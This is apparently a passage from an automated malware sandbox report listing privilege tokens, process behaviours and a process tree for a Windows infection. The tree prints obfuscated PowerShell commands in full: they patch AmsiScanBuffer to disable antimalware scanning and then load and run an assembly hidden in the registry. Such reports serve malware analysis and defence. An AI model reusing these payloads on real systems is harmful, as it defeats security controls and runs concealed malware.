Token: SeUndockPrivilege 5696 powershell.exe Token: SeManageVolumePrivilege 5696 powershell.exe Token: SeLockMemoryPrivilege 760 dialer.exe Token: SeDebugPrivilege 5400 powershell.EXE Token: SeDebugPrivilege 1784 powershell.EXE Token: SeDebugPrivilege 5368 dllhost.exe Token: SeShutdownPrivilege 3536 Explorer.EXE Token: SeCreatePagefilePrivilege 3536 Explorer.EXE Token: SeSecurityPrivilege 3536 Explorer.EXE Token: SeTakeOwnershipPrivilege 3536 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 1552 svchost.exe Token: SeIncreaseQuotaPrivilege 1552 svchost.exe Token: SeSecurityPrivilege 1552 svchost.exe Token: SeTakeOwnershipPrivilege 1552 svchost.exe Token: SeLoadDriverPrivilege 1552 svchost.exe Token: SeSystemtimePrivilege 1552 svchost.exe Token: SeBackupPrivilege 1552 svchost.exe Token: SeRestorePrivilege 1552 svchost.exe Token: SeShutdownPrivilege 1552 svchost.exe Token: SeSystemEnvironmentPrivilege 1552 svchost.exe Token: SeUndockPrivilege 1552 svchost.exe Token: SeManageVolumePrivilege 1552 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1552 svchost.exe Token: SeIncreaseQuotaPrivilege 1552 svchost.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
pid Process 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 5604 7zG.exe 3536 Explorer.EXE 2408 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe 1072 A9LDCODL.exe 4660 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE -
Suspicious use of SetWindowsHookEx 24 IoCs
pid Process 752 OpenWith.exe 752 OpenWith.exe 752 OpenWith.exe 3616 OpenWith.exe 4988 OpenWith.exe 4988 OpenWith.exe 4988 OpenWith.exe 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 3536 Explorer.EXE 4924 A9LDCODL.exe 3536 Explorer.EXE 3536 Explorer.EXE 2408 A9LDCODL.exe 4924 A9LDCODL.exe -
Suspicious use of UnmapMainImage 4 IoCs
pid Process 2636 svchost.exe 2536 RuntimeBroker.exe 3716 RuntimeBroker.exe 3536 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4660 wrote to memory of 4420 4660 msedge.exe 81 PID 4660 wrote to memory of 4420 4660 msedge.exe 81 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 3752 4660 msedge.exe 83 PID 4660 wrote to memory of 1620 4660 msedge.exe 84 PID 4660 wrote to memory of 1620 4660 msedge.exe 84 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 PID 4660 wrote to memory of 1688 4660 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:600
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1036
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1eaf5f63-d604-464a-bcac-c2536bd526c0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5368
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5bacf96c-67db-4c19-9a07-6b84bce6b458}2⤵PID:3700
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{844601dd-43a6-4ada-ac04-3f4917639d60}2⤵PID:5312
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{41a3914e-4c27-4356-b8f7-21113d07cebe}2⤵PID:3340
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1264 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:QhImxjyKWUtT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hVgsrERefJVIGM,[Parameter(Position=1)][Type]$PtfHVZUDZd)$rcUIbefiASF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'flec'+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$rcUIbefiASF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$rcUIbefiASF.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$PtfHVZUDZd,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $rcUIbefiASF.CreateType();}$haMKgsdSFTRfD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+'d'+[Char](115)+'');$miJwkyurBBmZzv=$haMKgsdSFTRfD.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MCEMcUxEndYtGJnfutR=QhImxjyKWUtT @([String])([IntPtr]);$WWvOXsWMgytOsqhnblTFBk=QhImxjyKWUtT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JNnwUqbiAGV=$haMKgsdSFTRfD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$MpDQEUBzVmeZsX=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$WisoKjmviHUuuPssW=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$NylEZcZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MpDQEUBzVmeZsX,$MCEMcUxEndYtGJnfutR).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$bZcmgaFQgxxEqstMP=$miJwkyurBBmZzv.Invoke($Null,@([Object]$NylEZcZ,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$stXJLHeppg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,4,[ref]$stXJLHeppg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bZcmgaFQgxxEqstMP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,0x20,[ref]$stXJLHeppg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+'l'+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:erecUyBKkUxD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cgvWXsDCHZbLGT,[Parameter(Position=1)][Type]$bXKWGCdfKN)$ChuGcCDErKR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'fl'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'mor'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$ChuGcCDErKR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+'Na'+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cgvWXsDCHZbLGT).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ChuGcCDErKR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+'g,'+'N'+'ew'+'S'+''+[Char](108)+'ot'+','+'V'+'i'+'r'+'t'+''+'u'+''+[Char](97)+'l',$bXKWGCdfKN,$cgvWXsDCHZbLGT).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $ChuGcCDErKR.CreateType();}$ZrqQNGUtvCJil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+'e'+'N'+'a'+[Char](116)+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$UyIwMnRWFMetix=$ZrqQNGUtvCJil.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPRIERKWTPoyHazJIDh=erecUyBKkUxD @([String])([IntPtr]);$zTGJYCarGFeLJUMHYnbjGP=erecUyBKkUxD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OPuhQtqlaYd=$ZrqQNGUtvCJil.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+'2'+'.'+'d'+''+'l'+'l')));$XEcoJPRbXlTNgs=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$kqwYXhPMqdADFvAjN=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TLCpCfA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XEcoJPRbXlTNgs,$TPRIERKWTPoyHazJIDh).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$PMQjRqMgBzukPdxFW=$UyIwMnRWFMetix.Invoke($Null,@([Object]$TLCpCfA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+'e'+[Char](114)+'')));$lhgbXNAFkV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,4,[ref]$lhgbXNAFkV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PMQjRqMgBzukPdxFW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,0x20,[ref]$lhgbXNAFkV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+'l'+[Char](101)+'r'+'s'+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5192
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:jsBBwFSiMSOA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XuIAgtFPvYHavm,[Parameter(Position=1)][Type]$MKdDtJgvOg)$PfHYSRNxgZY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+'mory'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'P'+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+'Ans'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+'o'+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$PfHYSRNxgZY.DefineConstructor('R'+'T'+'Speci'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XuIAgtFPvYHavm).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$PfHYSRNxgZY.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+'i'+''+'r'+''+[Char](116)+''+'u'+'al',$MKdDtJgvOg,$XuIAgtFPvYHavm).SetImplementationFlags('Ru'+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PfHYSRNxgZY.CreateType();}$kOKbJiaYMLkQT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 